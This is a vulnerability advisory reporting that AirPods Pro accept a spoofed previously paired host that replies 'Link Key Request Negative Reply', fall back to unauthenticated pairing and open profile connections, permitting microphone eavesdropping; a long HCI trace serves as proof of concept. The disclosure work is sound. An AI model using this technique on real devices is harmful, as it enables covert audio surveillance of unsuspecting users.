Apple: Airpods Pro Device Link without Key

Summary

The Apple Airpods Pros will initiate profile connections to a host previously paired that claims not to have a link key. (Other versions have not been tested)

This can be exploited by a malicious host capturing the airpods page request to its previously paired host and simply replying with Link Key Request Negative Reply during the link authentication procedure. The result is the Simple Pairing (without bonding or MITM Protection) procedure is performed to encrypt the connection and the profile connections are established, allowing the malicious host to open an HFP connection and exploit an open microphone.

Since the airpods had a previously established link key with the host, it likely should have terminated the link when the link could not be authenticated using the previously established link key. This is very similar to the BlueDump vulnerability where a malicious actor can force a vulnerable device to “dump” their previously established link key.

Severity

High - This vulnerability allows for a malicious actor to connect to Airpods Pro without a valid link key.

Proof of Concept

Connection request from the airpods

> HCI Event: Connect Request (0x04) plen 10                                                                              #9424 [hci0] 09:30:06.736875
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Class: 0x240418
          Major class: Audio/Video (headset, speaker, stereo, video, vcr)
          Minor class: Headphones
          Rendering (Printing, Speaker)
          Audio (Speaker, Microphone, Headset)
        Link type: ACL (0x01)
< HCI Command: Accept Connection Request (0x01|0x0009) plen 7                                                            #9425 [hci0] 09:30:06.737533
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Role: Central (0x00)
> HCI Event: Command Status (0x0f) plen 4                                                                                #9426 [hci0] 09:30:06.738590
      Accept Connection Request (0x01|0x0009) ncmd 1
        Status: Success (0x00)
> HCI Event: Role Change (0x12) plen 8                                                                                   #9427 [hci0] 09:30:06.859781
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Role: Central (0x00)
> HCI Event: Connect Complete (0x03) plen 11                                                                             #9429 [hci0] 09:30:07.053810
        Status: Success (0x00)
        Handle: 256
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Link type: ACL (0x01)
        Encryption: Disabled (0x00)
< HCI Command: Read Remote Version Information (0x01|0x001d) plen 2                                                      #9430 [hci0] 09:30:07.054279
        Handle: 256
< ACL Data TX: Handle 256 flags 0x00 dlen 10                                                                             #9431 [hci0] 09:30:07.054450
      L2CAP: Information Request (0x0a) ident 2 len 2
        Type: Extended features supported (0x0002)
> HCI Event: Command Status (0x0f) plen 4                                                                                #9432 [hci0] 09:30:07.054745
      Read Remote Version Information (0x01|0x001d) ncmd 1
        Status: Success (0x00)
< HCI Command: Read Remote Supported Features (0x01|0x001b) plen 2                                                       #9433 [hci0] 09:30:07.054993
        Handle: 256
> HCI Event: Command Status (0x0f) plen 4                                                                                #9434 [hci0] 09:30:07.055772
      Read Remote Supported Features (0x01|0x001b) ncmd 1
        Status: Success (0x00)
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4                                                           #9435 [hci0] 09:30:07.055950
        Handle: 256
        Link policy: 0x0005
          Enable Role Switch
          Enable Sniff Mode
> HCI Event: Command Complete (0x0e) plen 6                                                                              #9436 [hci0] 09:30:07.056752
      Write Link Policy Settings (0x02|0x000d) ncmd 1
        Status: Success (0x00)
        Handle: 256
< HCI Command: Read Clock Offset (0x01|0x001f) plen 2                                                                    #9437 [hci0] 09:30:07.057067
        Handle: 256
> HCI Event: Command Status (0x0f) plen 4                                                                                #9438 [hci0] 09:30:07.057809
      Read Clock Offset (0x01|0x001f) ncmd 1
        Status: Success (0x00)
< HCI Command: Change Connection Packet Type (0x01|0x000f) plen 4                                                        #9439 [hci0] 09:30:07.058040
        Handle: 256
        Packet type: 0xcc18
          DM1 may be used
          DH1 may be used
          DM3 may be used
          DH3 may be used
          DM5 may be used
          DH5 may be used
> HCI Event: Command Status (0x0f) plen 4                                                                                #9440 [hci0] 09:30:07.058818
      Change Connection Packet Type (0x01|0x000f) ncmd 1
        Status: Success (0x00)
< HCI Command: Remote Name Request (0x01|0x0019) plen 10                                                                 #9441 [hci0] 09:30:07.059170
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Page scan repetition mode: R1 (0x01)
        Page scan mode: Mandatory (0x00)
        Clock offset: 0x0000
> HCI Event: Connection Packet Type Changed (0x1d) plen 5                                                                #9442 [hci0] 09:30:07.059775
        Status: Success (0x00)
        Handle: 256
        Packet type: 0xcc18
          DM1 may be used
          DH1 may be used
          DM3 may be used
          DH3 may be used
          DM5 may be used
          DH5 may be used
> HCI Event: Command Status (0x0f) plen 4                                                                                #9443 [hci0] 09:30:07.060868
      Remote Name Request (0x01|0x0019) ncmd 1
        Status: Success (0x00)
< HCI Command: Write Link Supervision Timeout (0x03|0x0037) plen 4                                                       #9444 [hci0] 09:30:07.061319
        Handle: 256
        Timeout: 5000.000 msec (0x1f40)
> HCI Event: Command Complete (0x0e) plen 6                                                                              #9445 [hci0] 09:30:07.061750
      Write Link Supervision Timeout (0x03|0x0037) ncmd 1
        Status: Success (0x00)
        Handle: 256
> HCI Event: Max Slots Change (0x1b) plen 3                                                                              #9446 [hci0] 09:30:07.063752
        Handle: 256
        Max slots: 5
> HCI Event: Read Remote Version Complete (0x0c) plen 8                                                                  #9447 [hci0] 09:30:07.065855
        Status: Success (0x00)
        Handle: 256
        LMP version: Bluetooth 5.0 (0x09) - Subversion 29184 (0x7200)
        Manufacturer: Apple, Inc. (76)
> HCI Event: Read Remote Supported Features (0x0b) plen 11                                                               #9448 [hci0] 09:30:07.066884
        Status: Success (0x00)
        Handle: 256
        Features: 0xbf 0xfe 0x2f 0xfe 0xdb 0xff 0x7b 0x87
          3 slot packets
          5 slot packets
          Encryption
          Slot offset
          Timing accuracy
          Role switch
          Sniff mode
          Power control requests
          Channel quality driven data rate (CQDDR)
          SCO link
          HV2 packets
          HV3 packets
          u-law log synchronous data
          A-law log synchronous data
          CVSD synchronous data
          Paging parameter negotiation
          Power control
          Transparent synchronous data
          Flow control lag (middle bit)
          Enhanced Data Rate ACL 2 Mbps mode
          Enhanced Data Rate ACL 3 Mbps mode
          Enhanced inquiry scan
          Interlaced inquiry scan
          Interlaced page scan
          RSSI with inquiry results
          Extended SCO link (EV3 packets)
          EV4 packets
          EV5 packets
          AFH capable peripheral
          AFH classification peripheral
          LE Supported (Controller)
          3-slot Enhanced Data Rate ACL packets
          5-slot Enhanced Data Rate ACL packets
          Sniff subrating
          Pause encryption
          AFH capable central
          AFH classification central
          Enhanced Data Rate eSCO 2 Mbps mode
          Enhanced Data Rate eSCO 3 Mbps mode
          3-slot Enhanced Data Rate eSCO packets
          Extended Inquiry Response
          Simultaneous LE and BR/EDR (Controller)
          Secure Simple Pairing
          Encapsulated PDU
          Erroneous Data Reporting
          Non-flushable Packet Boundary Flag
          Link Supervision Timeout Changed Event
          Inquiry TX Power Level
          Enhanced Power Control
          Extended features
< HCI Command: Read Remote Extended Features (0x01|0x001c) plen 3                                                        #9449 [hci0] 09:30:07.067282
        Handle: 256
        Page: 1
> HCI Event: Command Status (0x0f) plen 4                                                                                #9450 [hci0] 09:30:07.067748
      Read Remote Extended Features (0x01|0x001c) ncmd 1
        Status: Success (0x00)
> HCI Event: Read Clock Offset Complete (0x1c) plen 5                                                                    #9451 [hci0] 09:30:07.068777
        Status: Success (0x00)
        Handle: 256
        Clock offset: 0x0760
> HCI Event: Remote Name Req Complete (0x07) plen 255                                                                    #9452 [hci0] 09:30:07.074843
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Name: AirPods Pro
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9453 [hci0] 09:30:07.075780
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 16                                                                             #9454 [hci0] 09:30:07.076007
      L2CAP: Information Response (0x0b) ident 2 len 8
        Type: Extended features supported (0x0002)
        Result: Success (0x0000)
        Features: 0x00000280
          Fixed Channels
          Unicast Connectionless Data Reception
< ACL Data TX: Handle 256 flags 0x00 dlen 10                                                                             #9455 [hci0] 09:30:07.076110
      L2CAP: Information Request (0x0a) ident 3 len 2
        Type: Fixed channels supported (0x0003)
> HCI Event: Read Remote Extended Features (0x23) plen 13                                                                #9456 [hci0] 09:30:07.076797
        Status: Success (0x00)
        Handle: 256
        Page: 1/2
        Features: 0x07 0x00 0x00 0x00 0x00 0x00 0x00 0x00
          Secure Simple Pairing (Host Support)
          LE Supported (Host)
          Simultaneous LE and BR/EDR (Host)
< HCI Command: Read Remote Extended Features (0x01|0x001c) plen 3                                                        #9457 [hci0] 09:30:07.076869
        Handle: 256
        Page: 2
> HCI Event: Command Status (0x0f) plen 4                                                                                #9458 [hci0] 09:30:07.077783
      Read Remote Extended Features (0x01|0x001c) ncmd 1
        Status: Success (0x00)
> HCI Event: Read Remote Extended Features (0x23) plen 13                                                                #9459 [hci0] 09:30:07.078830
        Status: Success (0x00)
        Handle: 256
        Page: 2/2
        Features: 0x00 0x03 0x00 0x00 0x00 0x00 0x00 0x00
          Secure Connections (Controller Support)
          Ping
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4                                                           #9460 [hci0] 09:30:07.079099
        Handle: 256
        Link policy: 0x0005
          Enable Role Switch
          Enable Sniff Mode
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9461 [hci0] 09:30:07.079786
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Command Complete (0x0e) plen 6                                                                              #9462 [hci0] 09:30:07.080912
      Write Link Policy Settings (0x02|0x000d) ncmd 1
        Status: Success (0x00)
        Handle: 256
> ACL Data RX: Handle 256 flags 0x02 dlen 20                                                                             #9463 [hci0] 09:30:07.098028
      L2CAP: Information Response (0x0b) ident 3 len 12
        Type: Fixed channels supported (0x0003)
        Result: Success (0x0000)
        Channels: 0x0001000000000040
          Security Manager (LE)
          Unknown channels (0x1000000000000)
> ACL Data RX: Handle 256 flags 0x02 dlen 10                                                                             #9464 [hci0] 09:30:07.128121
      L2CAP: Information Request (0x0a) ident 4 len 2
        Type: Extended features supported (0x0002)
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9465 [hci0] 09:30:07.128399
      L2CAP: Information Response (0x0b) ident 4 len 8
        Type: Extended features supported (0x0002)
        Result: Success (0x0000)
        Features: 0x000000b8
          Enhanced Retransmission Mode
          Streaming Mode
          FCS Option
          Fixed Channels
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9466 [hci0] 09:30:07.131828
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 10                                                                             #9467 [hci0] 09:30:07.137007
      L2CAP: Information Request (0x0a) ident 5 len 2
        Type: Fixed channels supported (0x0003)
< ACL Data TX: Handle 256 flags 0x00 dlen 20                                                                             #9468 [hci0] 09:30:07.137270
      L2CAP: Information Response (0x0b) ident 5 len 12
        Type: Fixed channels supported (0x0003)
        Result: Success (0x0000)
        Channels: 0x0000000000000082
          L2CAP Signaling (BR/EDR)
          Security Manager (BR/EDR)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9469 [hci0] 09:30:07.140908
        Num handles: 1
        Handle: 256
        Count: 1

Authentication requested by the airpods, link key negative reply and Simple Pairing (without bonding)

> HCI Event: Link Key Request (0x17) plen 6                                                                              #9491 [hci0] 09:30:07.219924
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
< HCI Command: Link Key Request Negative Reply (0x01|0x000c) plen 6                                                      #9492 [hci0] 09:30:07.220183
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: Command Complete (0x0e) plen 10                                                                             #9493 [hci0] 09:30:07.220846
      Link Key Request Negative Reply (0x01|0x000c) ncmd 1
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: IO Capability Response (0x32) plen 9                                                                        #9494 [hci0] 09:30:07.226834
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        IO capability: NoInputNoOutput (0x03)
        OOB data: Authentication data not present (0x00)
        Authentication: No Bonding - MITM not required (0x00)
> HCI Event: IO Capability Request (0x31) plen 6                                                                         #9495 [hci0] 09:30:07.227829
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
< HCI Command: IO Capability Request Reply (0x01|0x002b) plen 9                                                          #9496 [hci0] 09:30:07.228100
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        IO capability: DisplayYesNo (0x01)
        OOB data: Authentication data not present (0x00)
        Authentication: No Bonding - MITM not required (0x00)
> HCI Event: Command Complete (0x0e) plen 10                                                                             #9497 [hci0] 09:30:07.228832
      IO Capability Request Reply (0x01|0x002b) ncmd 1
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: User Confirmation Request (0x33) plen 10                                                                    #9498 [hci0] 09:30:07.445150
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Passkey: 145789
< HCI Command: User Confirmation Request Reply (0x01|0x002c) plen 6                                                      #9499 [hci0] 09:30:07.446451
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: Command Complete (0x0e) plen 10                                                                             #9500 [hci0] 09:30:07.446959
      User Confirmation Request Reply (0x01|0x002c) ncmd 1
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: Simple Pairing Complete (0x36) plen 7                                                                       #9501 [hci0] 09:30:07.545205
        Status: Success (0x00)
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
> HCI Event: Link Key Notification (0x18) plen 23                                                                        #9502 [hci0] 09:30:07.638209
        Address: D0:65:44:C6:2E:36 (OUI D0-65-44)
        Link key: 61236b92078f2ee1b3460ac494340dc7
        Key type: Unauthenticated Combination key from P-192 (0x04)
> HCI Event: Encryption Change (0x08) plen 4                                                                             #9503 [hci0] 09:30:07.710118
        Status: Success (0x00)
        Handle: 256
        Encryption: Enabled (0x01)
< HCI Command: Read Encryption Key Size (0x05|0x0008) plen 2                                                             #9504 [hci0] 09:30:07.710476
        Handle: 256
> HCI Event: Command Complete (0x0e) plen 7                                                                              #9505 [hci0] 09:30:07.711077
      Read Encryption Key Size (0x05|0x0008) ncmd 1
        Status: Success (0x00)
        Handle: 256
        Key size: 16

Profile connections are established

> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9506 [hci0] 09:30:07.712010
      L2CAP: Connection Request (0x02) ident 8 len 4
        PSM: 3 (0x0003)
        Source CID: 517
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9507 [hci0] 09:30:07.712435
      L2CAP: Connection Response (0x03) ident 8 len 8
        Destination CID: 91
        Source CID: 517
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9508 [hci0] 09:30:07.712472
      L2CAP: Configure Request (0x04) ident 5 len 8
        Destination CID: 517
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1691
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9509 [hci0] 09:30:07.716074
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9510 [hci0] 09:30:07.717070
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9511 [hci0] 09:30:07.721004
      L2CAP: Configure Request (0x04) ident 9 len 4
        Destination CID: 91
        Flags: 0x0000
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9512 [hci0] 09:30:07.721005
      L2CAP: Configure Response (0x05) ident 5 len 10
        Source CID: 91
        Flags: 0x0000
        Result: Success (0x0000)
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1691
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9513 [hci0] 09:30:07.721315
      L2CAP: Configure Response (0x05) ident 9 len 6
        Source CID: 517
        Flags: 0x0000
        Result: Success (0x0000)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9514 [hci0] 09:30:07.725077
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 8                                                                              #9515 [hci0] 09:30:07.730002
      Channel: 91 len 4 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Set Async Balance Mode (SABM) (0x2f)
         Address: 0x03 cr 1 dlci 0x00
         Control: 0x3f poll/final 1
         Length: 0
         FCS: 0x1c
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9516 [hci0] 09:30:07.730004
      L2CAP: Connection Request (0x02) ident 10 len 4
        PSM: 25 (0x0019)
        Source CID: 774
< ACL Data TX: Handle 256 flags 0x00 dlen 8                                                                              #9517 [hci0] 09:30:07.730341
      Channel: 517 len 4 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Ack (UA) (0x63)
         Address: 0x03 cr 1 dlci 0x00
         Control: 0x73 poll/final 1
         Length: 0
         FCS: 0xd7
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9518 [hci0] 09:30:07.730368
      L2CAP: Connection Response (0x03) ident 10 len 8
        Destination CID: 92
        Source CID: 774
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9519 [hci0] 09:30:07.730373
      L2CAP: Configure Request (0x04) ident 6 len 8
        Destination CID: 774
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9520 [hci0] 09:30:07.732005
      L2CAP: Connection Request (0x02) ident 11 len 4
        PSM: 23 (0x0017)
        Source CID: 1031
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9521 [hci0] 09:30:07.732296
      L2CAP: Connection Response (0x03) ident 11 len 8
        Destination CID: 93
        Source CID: 1031
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9522 [hci0] 09:30:07.734081
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9523 [hci0] 09:30:07.734334
      L2CAP: Configure Request (0x04) ident 7 len 8
        Destination CID: 1031
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 512
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9524 [hci0] 09:30:07.735081
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9525 [hci0] 09:30:07.766233
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9526 [hci0] 09:30:07.767101
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 20                                                                             #9527 [hci0] 09:30:07.768029
      L2CAP: Configure Request (0x04) ident 12 len 12
        Destination CID: 92
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1023
        Option: Flush Timeout (0x02) [mandatory]
          Flush timeout: 30
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9528 [hci0] 09:30:07.768033
      Channel: 91 len 14 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x03 cr 1 dlci 0x00
         Control: 0xef poll/final 0
         Length: 10
         FCS: 0x70
         MCC Message type: DLC Parameter Negotiation CMD (0x20)
           Length: 8
           dlci 6 frame_type 0 credit_flow 15 pri 0
           ack_timer 0 frame_size 1018 max_retrans 0 credits 0
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9529 [hci0] 09:30:07.768271
      L2CAP: Configure Response (0x05) ident 12 len 6
        Source CID: 774
        Flags: 0x0000
        Result: Success (0x0000)
< ACL Data TX: Handle 256 flags 0x00 dlen 18                                                                             #9530 [hci0] 09:30:07.768301
      Channel: 517 len 14 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x01 cr 0 dlci 0x00
         Control: 0xef poll/final 0
         Length: 10
         FCS: 0xaa
         MCC Message type: DLC Parameter Negotiation RSP (0x20)
           Length: 8
           dlci 6 frame_type 0 credit_flow 14 pri 0
           ack_timer 0 frame_size 256 max_retrans 0 credits 7
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9531 [hci0] 09:30:07.769098
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9532 [hci0] 09:30:07.771004
      L2CAP: Configure Response (0x05) ident 6 len 10
        Source CID: 92
        Flags: 0x0000
        Result: Success (0x0000)
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
> ACL Data RX: Handle 256 flags 0x02 dlen 16                                                                             #9533 [hci0] 09:30:07.771004
      L2CAP: Configure Request (0x04) ident 13 len 8
        Destination CID: 93
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1023
< ACL Data TX: Handle 256 flags 0x00 dlen 14                                                                             #9534 [hci0] 09:30:07.771393
      L2CAP: Configure Response (0x05) ident 13 len 6
        Source CID: 1031
        Flags: 0x0000
        Result: Success (0x0000)
< HCI Command: Sniff Subrating (0x02|0x0011) plen 8                                                                      #9535 [hci0] 09:30:07.771421
        Handle: 256
        Max latency: 750.000 msec (0x04b0)
        Min remote timeout: 1.250 msec (0x0002)
        Min local timeout: 1.250 msec (0x0002)
> HCI Event: Command Complete (0x0e) plen 6                                                                              #9536 [hci0] 09:30:07.772104
      Sniff Subrating (0x02|0x0011) ncmd 1
        Status: Success (0x00)
        Handle: 256
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9537 [hci0] 09:30:07.773004
      L2CAP: Configure Response (0x05) ident 7 len 10
        Source CID: 93
        Flags: 0x0000
        Result: Success (0x0000)
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 512
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9538 [hci0] 09:30:07.773095
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9539 [hci0] 09:30:07.773284
      L2CAP: Connection Request (0x02) ident 8 len 4
        PSM: 1 (0x0001)
        Source CID: 94
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9540 [hci0] 09:30:07.774101
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9541 [hci0] 09:30:07.775101
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9542 [hci0] 09:30:07.777106
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 8                                                                              #9543 [hci0] 09:30:07.778002
      Channel: 91 len 4 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Set Async Balance Mode (SABM) (0x2f)
         Address: 0x1b cr 1 dlci 0x06
         Control: 0x3f poll/final 1
         Length: 0
         FCS: 0xd3
< ACL Data TX: Handle 256 flags 0x00 dlen 8                                                                              #9544 [hci0] 09:30:07.778339
      Channel: 517 len 4 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Ack (UA) (0x63)
         Address: 0x1b cr 1 dlci 0x06
         Control: 0x73 poll/final 1
         Length: 0
         FCS: 0x18
< HCI Command: Sniff Subrating (0x02|0x0011) plen 8                                                                      #9545 [hci0] 09:30:07.778372
        Handle: 256
        Max latency: 750.000 msec (0x04b0)
        Min remote timeout: 1.250 msec (0x0002)
        Min local timeout: 1.250 msec (0x0002)
> HCI Event: Command Complete (0x0e) plen 6                                                                              #9546 [hci0] 09:30:07.779104
      Sniff Subrating (0x02|0x0011) ncmd 1
        Status: Success (0x00)
        Handle: 256
> ACL Data RX: Handle 256 flags 0x02 dlen 6                                                                              #9547 [hci0] 09:30:07.780003
      Channel: 92 len 2 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Discover (0x01) Command (0x00) type 0x00 label 1 nosp 0
< ACL Data TX: Handle 256 flags 0x00 dlen 8                                                                              #9548 [hci0] 09:30:07.780202
      Channel: 774 len 4 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Discover (0x01) Response Accept (0x02) type 0x00 label 1 nosp 0
        ACP SEID: 1
          Media Type: Audio (0x00)
          SEP Type: SRC (0x00)
          In use: No
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9549 [hci0] 09:30:07.782100
        Num handles: 1
        Handle: 256
        Count: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9550 [hci0] 09:30:07.783101
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 16                                                                             #9551 [hci0] 09:30:07.784002
      L2CAP: Connection Response (0x03) ident 8 len 8
        Destination CID: 1288
        Source CID: 94
        Result: Connection successful (0x0000)
        Status: No further information available (0x0000)
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9552 [hci0] 09:30:07.784003
      L2CAP: Disconnection Request (0x06) ident 14 len 4
        Destination CID: 90
        Source CID: 260
< ACL Data TX: Handle 256 flags 0x00 dlen 16                                                                             #9553 [hci0] 09:30:07.784229
      L2CAP: Configure Request (0x04) ident 9 len 8
        Destination CID: 1288
        Flags: 0x0000
        Option: Maximum Transmission Unit (0x01) [mandatory]
          MTU: 1024
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9554 [hci0] 09:30:07.784242
      L2CAP: Disconnection Response (0x07) ident 14 len 4
        Destination CID: 90
        Source CID: 260
> ACL Data RX: Handle 256 flags 0x02 dlen 18                                                                             #9555 [hci0] 09:30:07.786003
      Channel: 93 len 14 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Command: type 0x00 label 0 PID 0x110e
        AV/C: Status: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: GetCapabilities pt Single len 0x0001
            CapabilityID: 0x03 (EventsID)
< ACL Data TX: Handle 256 flags 0x00 dlen 26                                                                             #9556 [hci0] 09:30:07.786319
      Channel: 1031 len 22 [PSM 23 mode Basic (0x00)] {chan 3}
      AVCTP Control: Response: type 0x00 label 0 PID 0x110e
        AV/C: Stable: address 0x48 opcode 0x00
          Subunit: Panel
          Opcode: Vendor Dependent
          Company ID: 0x001958
          AVRCP: GetCapabilities pt Single len 0x0009
            CapabilityID: 0x03 (EventsID)
            CapabilityCount: 0x07
            EventsID: 0x01 (EVENT_PLAYBACK_STATUS_CHANGED)
            EventsID: 0x02 (EVENT_TRACK_CHANGED)
            EventsID: 0x05 (EVENT_PLAYBACK_POS_CHANGED)
            EventsID: 0x09 (EVENT_NOW_PLAYING_CONTENT_CHANGED)
            EventsID: 0x0a (EVENT_AVAILABLE_PLAYERS_CHANGED)
            EventsID: 0x0b (EVENT_ADDRESSED_PLAYER_CHANGED)
            EventsID: 0x0c (EVENT_UIDS_CHANGED)
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9557 [hci0] 09:30:07.787111
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 12                                                                             #9558 [hci0] 09:30:07.788005
      Channel: 91 len 8 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x03 cr 1 dlci 0x00
         Control: 0xef poll/final 0
         Length: 4
         FCS: 0x70
         MCC Message type: Modem Status Command CMD (0x38)
           Length: 2
           dlci 6 
           fc 0 rtc 1 rtr 1 ic 0 dv 1
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9559 [hci0] 09:30:07.788338
      Channel: 517 len 8 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x01 cr 0 dlci 0x00
         Control: 0xef poll/final 0
         Length: 4
         FCS: 0xaa
         MCC Message type: Modem Status Command RSP (0x38)
           Length: 2
           dlci 6 
           fc 0 rtc 1 rtr 1 ic 0 dv 1
< ACL Data TX: Handle 256 flags 0x00 dlen 12                                                                             #9560 [hci0] 09:30:07.788366
      Channel: 517 len 8 [PSM 3 mode Basic (0x00)] {chan 1}
      RFCOMM: Unnumbered Info with Header Check (UIH) (0xef)
         Address: 0x01 cr 0 dlci 0x00
         Control: 0xef poll/final 0
         Length: 4
         FCS: 0xaa
         MCC Message type: Modem Status Command CMD (0x38)
           Length: 2
           dlci 6 
           fc 0 rtc 1 rtr 1 ic 0 dv 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9561 [hci0] 09:30:07.789108
        Num handles: 1
        Handle: 256
        Count: 1
> ACL Data RX: Handle 256 flags 0x02 dlen 7                                                                              #9562 [hci0] 09:30:07.790003
      Channel: 92 len 3 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Get All Capabilities (0x0c) Command (0x00) type 0x00 label 2 nosp 0
        ACP SEID: 1
> HCI Event: Number of Completed Packets (0x13) plen 5                                                                   #9563 [hci0] 09:30:07.790109
        Num handles: 1
        Handle: 256
        Count: 1
< ACL Data TX: Handle 256 flags 0x00 dlen 18                                                                             #9564 [hci0] 09:30:07.790325
      Channel: 774 len 14 [PSM 25 mode Basic (0x00)] {chan 2}
      AVDTP: Get All Capabilities (0x0c) Response Accept (0x02) type 0x00 label 2 nosp 0
        Service Category: Media Transport (0x01)
        Service Category: Media Codec (0x07)
          Media Type: Audio (0x00)
          Media Codec: SBC (0x00)
            Frequency: 0x20
              44100
            Channel Mode: 0x09
              Mono
              Joint Stereo
            Block Length: 0xf0
              4
              8
              12
              16
            Subbands: 0x04
              8
            Allocation Method: 0x01
              Loudness
            Minimum Bitpool: 2
